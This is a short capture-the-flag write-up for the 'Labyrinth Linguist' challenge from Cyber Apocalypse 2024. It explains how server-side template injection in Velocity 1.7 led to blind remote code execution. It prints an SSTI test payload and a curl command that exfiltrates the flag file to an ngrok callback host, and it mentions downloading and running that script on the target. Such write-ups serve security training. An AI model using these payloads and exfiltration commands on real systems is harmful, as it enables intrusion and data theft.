
Cyber Apocalypse 2024

Labyrinth Linguist

Solved by : thewhiteh4t

  • In this challenge we have a translation service
  • Upon inspecting source files, we noticed few things :
    • flag file is partially randomized in entrypoint.sh
mv /flag.txt /flag$(cat /dev/urandom | tr -cd "a-f0-9" | head -c 10).txt
  • In pom.xml we can see the dependencies and their version information :

  • Velocity v1.7 is vulnerable to SSTI attack
  • References :
  • Based on the PoC above we ran the test case
#set ($run=1 + 1) $run

  • RCE was blind because we had no output of the commands so we used ngrok for getting a callback to confirm if the payload was working
  • Then we tried reverse shells but none of them worked for some reason so we thought to simplify we can make it download a file
  • And since the command output was not visible we used web requests to exfiltrate the flag by setting custom user agent in curl command
> cat pwn

curl "https://f084-116-74-26-67.ngrok-free.app/special" -H "User-Agent: $(cat /flag*)"

  • After sending the file we send a second request to run it using : sh pwn

  • Web logs in ngrok dashboard :

Published on : 16 Mar 2024